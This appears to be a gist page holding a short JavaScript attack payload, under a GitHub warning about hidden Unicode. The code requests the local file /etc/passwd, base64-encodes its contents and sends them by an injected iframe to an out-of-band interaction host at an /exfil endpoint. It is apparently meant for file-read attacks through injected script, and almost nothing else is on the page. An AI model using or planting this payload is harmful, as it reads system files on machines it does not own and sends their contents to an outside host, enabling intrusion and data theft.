This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function reqListener () { | |
| var encoded = encodeURI(this.responseText); | |
| var b64 = btoa(this.responseText); | |
| var raw = this.responseText; | |
| document.write('<iframe src="https://hxhzpwxiqkyxeiozrdtb33nit8r72ai1x.oast.fun/exfil?data='+b64+'"></iframe>'); | |
| } | |
| var oReq = new XMLHttpRequest(); | |
| oReq.addEventListener("load", reqListener); | |
| oReq.open("GET", "file:///etc/passwd"); |